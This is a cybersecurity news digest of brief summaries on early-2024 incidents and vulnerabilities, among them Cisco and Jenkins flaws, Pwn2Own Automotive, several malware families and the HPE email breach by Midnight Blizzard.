Daily Brief

Numerous iOS apps are exploiting push notifications as a means to initiate background processes that collect extensive user data without user consent. Mobile researcher Mysk has highlighted a significant privacy risk where these apps circumvent Apple’s background activity restrictions to gather information for potential fingerprinting and tracking. Apps are taking advantage of a feature in iOS that allows for quiet background launching to process new push notifications and are using this as an opportunity to send device data back to their servers. Apps that abuse this feature, including TikTok and Facebook, collect various data points such as system uptime, locale, battery status, and display brightness, which could be used for user profiling. Apple plans to address this issue by tightening the use of APIs linked to device signals; starting in Spring 2024, apps must explicitly declare their reasons for API access to remain on the App Store. Until these new Apple policies are in effect, users are advised to disable push notifications entirely to avoid possible data collection, as merely muting them will not prevent the exploitation. Revelations from December indicate that governments have requested push notification records from Apple and Google to monitor users, but Apple is barred from disclosing details about these requests.

Synacktiv Team secured $100,000 for exploiting two zero-day vulnerabilities to compromise Tesla's Infotainment System. They also exploited a three-bug zero-day chain in the Automotive Grade Linux OS, earning an additional $35,000. On the first day, Synacktiv earned $295,000 by rooting a Tesla Modem and hacking various EV charging stations. In total, 48 unique zero-days were discovered during the competition, with prizes amounting to $1,101,500. Vendors are given a 90-day deadline to address the vulnerabilities before they are publicly disclosed by TrendMicro’s Zero Day Initiative. Pwn2Own Automotive 2024 is held as part of the Automotive World conference in Tokyo, with a focus on vehicle and EV charger security. The competition challenges participants to hack EV chargers, operating systems, and infotainment systems, with a top prize of $200,000 and a Tesla car. The event follows a successful Pwn2Own Vancouver 2023 where researchers earned $1,035,000 and a Tesla Model 3.

Cisco has issued a security advisory for a critical remote code execution (RCE) vulnerability affecting several of its Unified Communications Manager and Contact Center Solutions products. The vulnerability, assigned CVE-2024-20253, could allow an unauthenticated, remote attacker to execute arbitrary code on an impacted system. Discovered by Synacktiv researcher Julien Egloff, the severity of the flaw is rated 9.9 out of 10, indicating a critical level of potential impact. Attackers could exploit the flaw by sending a specially crafted message to a listening port on vulnerable devices, potentially gaining command execution with root access. Affected products are at risk in their default configurations, and Cisco has made security updates available as there is no alternative workaround. Cisco advises administrators to set up access control lists (ACLs) to restrict access to affected components until updates can be applied. The company has shared detailed guidance on implementing ACLs and cautions admins to assess, test, and understand the implications of mitigation before deployment to avoid business disruption. There have been no reports of public announcements or malicious exploitation of the vulnerability as of the issuance of the advisory.

Cybersecurity researchers have conducted in-depth analysis of the command-and-control (C2) server infrastructure for SystemBC malware. SystemBC is available for purchase on dark web marketplaces and enables attackers to remotely control compromised hosts and facilitate the delivery of additional payloads. The malware, which first appeared in 2018, is known for using SOCKS5 proxies to obfuscate network traffic and maintain persistent access for post-exploitation activities. The malware package sold includes executables for both Windows and Linux, a PHP-based web panel for the C2 server, and detailed instructions in multiple languages. The C2 server opens multiple TCP ports to manage C2 traffic, inter-process communication, and connections with each infected host. The PHP panel is simple but provides real-time information on active implants and allows operators to run shellcode and arbitrary files on compromised machines. The analysis also covered an updated version of DarkGate, a RAT that compromises victim systems, with researchers identifying a decoding weakness in its custom Base64 alphabet used for exfiltration. The findings contribute to better understanding and identification of cyber threats, highlighting the continuous evolution of malware techniques.

Hackers are exploiting a critical severity flaw in the 'Better Search Replace' WordPress plugin, actively installed on over one million sites. The vulnerability, tracked as CVE-2023-6933, could allow unauthenticated attackers to inject a PHP object due to deserialization of untrusted input. The WP Engine vendor has released an update, version 1.4.5, to address this security issue, which can lead to code execution, data access, and potential denial of service. While 'Better Search Replace' itself isn't directly vulnerable, the flaw can be exploited in conjunction with other plugins or themes that contain a suitable Property Oriented Programming (POP) chain. Wordfence, a WordPress security firm, has reported blocking over 2,500 attacks exploiting this vulnerability in just 24 hours. Although there have been close to half a million downloads of the plugin in the past week, clarity on the update adoption rate amongst users remains uncertain. Users are urged to upgrade to the patched version 1.4.5 immediately to prevent potential security breaches and exploitation.

EquiLend, a major US securities lender, took systems offline due to an unauthorized access incident, impacting Wall Street transactions. Systems restoration is anticipated to take several days, with external cybersecurity firms aiding in the investigation and recovery efforts. The cyber attack was noticed on January 22, 2024, and the company is now operating manually, which may affect transaction efficiency and quality. LockBit ransomware group claims responsibility for the breach and asserts ongoing negotiations with EquiLend. Manual operations may lead to reduced performance and increased costs but typically have a manageable impact on financial services. The cybersecurity incident occurs amid EquiLend's recent agreement to sell a majority stake to a private equity firm, which could be valued at up to $700 million. This attack follows a series of high-profile cybersecurity breaches in the US financial industry, including Fidelity National Financial, Mr Cooper, and loanDepot.

Jenkins has resolved nine security issues, including a critical remote code execution (RCE) vulnerability, identified as CVE-2024-23897. The flaw stems from an arbitrary file read vulnerability via the built-in command line interface, caused by a feature in the command parser. Attackers could exploit this to read arbitrary files on the Jenkins server, with limitations on certain binary file contents due to encoding. Those with "Overall/Read" permission could potentially access entire files, leading to escalated attack possibilities. Jenkins has released fixes in versions 2.442 and LTS 2.426.3, and advises disabling CLI access as a short-term mitigation strategy. The discovery of this critical vulnerability comes after Jenkins addressed serious security issues almost a year prior. Users are urged to patch their systems immediately to prevent potential exploitation of this vulnerability.

LODEINFO, an evolving fileless backdoor malware, has been updated with new anti-analysis techniques and remote code execution features. Spear-phishing campaigns distribute the malware, which originally targeted Japanese entities but now includes broader language settings. Stone Panda, a Chinese nation-state actor, has been identified as being behind the attacks that deploy LODEINFO via malicious Microsoft Word document macros. Recent versions of LODEINFO implement remote template injection to retrieve malicious macros and use language checks for Microsoft Office settings. LODEINFO version 0.7.1 adds an intermediate stage that involves downloading a file mimicking a Privacy-Enhanced Mail which then loads the backdoor into memory. The latest techniques underscore the necessity for memory-scanning cybersecurity solutions to detect and mitigate fileless malware threats. The article also alludes to a SaaS Security Masterclass for critical security insights based on a study of 493 companies.

The Axur Threat Landscape Report for 2023/2024 reveals a significant increase in cyberattacks and the convergence of cyber risk with business risk, urging organizations to revamp security strategies. Geopolitical tensions notably affect the cybersecurity sector, influencing cybercriminal tactics, as seen in the Russia-Ukraine conflict. Ransomware evolves to prioritize data exposure over encryption, pressing organizations with higher risks of data breach fines. The use of AI in cyber threats has escalated, enabling more sophisticated scams including deepfake videos and automated social engineering. The report notes a threefold increase in leaked credit and debit card details, credential leaks remain stable but with changes in sources. Axur highlights the importance of brand protection due to increased detection of brand misuse, and reports on innovative fraud tactics such as "apphishing". The successful execution of takedowns by Axur and their rapid response times are emphasized as key in mitigating cyber threats. Insights from the Deep & Dark Web show an urgent need for comprehensive monitoring and swift response to preemptive cybersecurity. Axur introduces Polaris, an AI-powered threat management tool, to streamline threat intelligence and heighten organizational response capabilities.

A China-backed APT group, known as Blackwood, has been hijacking legitimate software updates to deliver "NSPX30" spyware, active since at least 2018. The attacks predominantly target manufacturing, trading, and engineering companies in China, Japan, and the U.K., along with individuals within these regions. NSPX30 includes multiple components designed to hide its infrastructure and is capable of bypassing Chinese antivirus programs. Origins of the backdoor date to Project Wood from 2005, having evolved through various iterations, now exploiting unencrypted HTTP protocols to intercept and deliver malicious updates. ESET suggests that compromised network appliances like routers may be used to distribute the malware, although the exact delivery mechanism remains unclear. Once deployed, the NSPX30 orchestrator component executes, leading to the download of a backdoor that enables file collection, reverse shell creation, process termination, keystroke logging, and self-uninstallation capabilities. The recently identified activities of APT group Volt Typhoon highlight an ongoing trend of attackers leveraging outdated network infrastructure to facilitate espionage and data exfiltration.

A newly discovered malware loader, CherryLoader, is impersonating a legitimate note-taking app, CherryTree, to deploy exploits for privilege escalation on compromised hosts. Analysis by Arctic Wolf Labs has identified the loader in two intrusions, using it to drop the privilege escalation tools PrintSpoofer or JuicyPotatoNG. CherryLoader features modularity, enabling attackers to swap exploits without needing to recompile the malware’s code. The distribution method of CherryLoader is uncertain, but observed attack chains indicated it uses a RAR file hosted on a specific IP address. The malware uses process ghosting, an evasive fileless technique, to run its payload, avoiding detection by antivirus systems like Microsoft Defender. After successful privilege escalation, the malware establishes persistence on the victim's device with a batch file script that also attempts to disarm Microsoft Defender. Security experts warn that CherryLoader is a sophisticated multi-stage downloader with encryption and anti-analysis techniques designed to deploy public privilege escalation exploits stealthily.

Russian hackers, linked to the Kremlin and known as APT29, have infiltrated HP Enterprise's cloud email environment, leading to data exfiltration. The breach, reported in an SEC filing by HPE, involved unauthorized access to mailboxes of key personnel in cybersecurity and other vital departments. The intrusion at HPE, reported to have begun in May 2023, lasted over six months before detection, with the company notified on December 12, 2023. The same Russian group is believed to have conducted a similar attack against Microsoft's corporate systems in November 2023. A prior security event, also attributed to APT29, occurred with SharePoint files being exfiltrated as early as May 2023, with HPE alerted in June 2023. HPE claims the recent security breach has not significantly impacted its business operations, although details of the theft's extent remain undisclosed. APT29 is linked to the Russian SVR and is known for its involvement in several high-profile cyber-attacks, including the 2016 DNC hack and the 2020 SolarWinds incident.

Hewlett Packard Enterprise (HPE) announced that suspected Russian entity Cozy Bear breached its cloud email system. The malicious activity began in May 2023 and was first detected by HPE in June 2023, but initial containment measures seemed ineffective. Cozy Bear, also known as Midnight Blizzard, accessed and exfiltrated data from select HPE mailboxes. Affected email accounts were related to cybersecurity, sales, and other business operations of HPE. HPE launched an immediate response to investigate, contain, and remediate the breach, claiming to have eradicated the cyber intrusion. Despite the security breach, HPE reported that the incident did not materially impact its operations or future financial projections. HPE's stock price remained stable following the announcement, reflecting investor perception that such breaches are expected risks for technology companies. This breach raises concerns about the reliability of major tech companies' security offerings, especially as Microsoft and HPE both disclosed security breaches within the same week.

US judge refuses to dismiss Apple's lawsuit against NSO Group for deploying spyware on iDevices. Apple accuses NSO of violating US Computer Fraud and Abuse Act and other laws via Pegasus spyware. NSO must now respond to Apple's allegations by February 14 following court's decision to proceed. Pegasus allowed unauthorized access to phone calls, messages, and device cameras and microphones. NSO has faced US sanctions and claims of misuse of its spyware by targeting journalists and activists. The court ruled that Apple's loss fits within the anti-hacking law, dismissing NSO's motion. Apple continues fight against spyware through new security features and civil society support grants. NSO Group to continue legal battle, claiming their technology is vital for law enforcement and safety.

HPE disclosed that Russian hackers, known as Midnight Blizzard, accessed their Office 365 email environment, targeting cybersecurity team among others. Midnight Blizzard is attributed to various attacks, including the 2020 SolarWinds breach, and is believed to be part of Russia's SVR. Hackers exfiltrated data from HPE mailboxes since May 2023, as revealed in a recent SEC filing. HPE's investigation relates this incident to an earlier breach of their SharePoint server in May 2023. HPE is working with external cybersecurity experts and law enforcement to further investigate the breach. HPE activated immediate cyber response protocols upon discovery to investigate and mitigate the breach. There has been no operational impact on HPE’s business, and no significant financial impact is anticipated. The breach at HPE follows a separate, but potentially similar, incident involving Midnight Blizzard's data theft from Microsoft's corporate email accounts.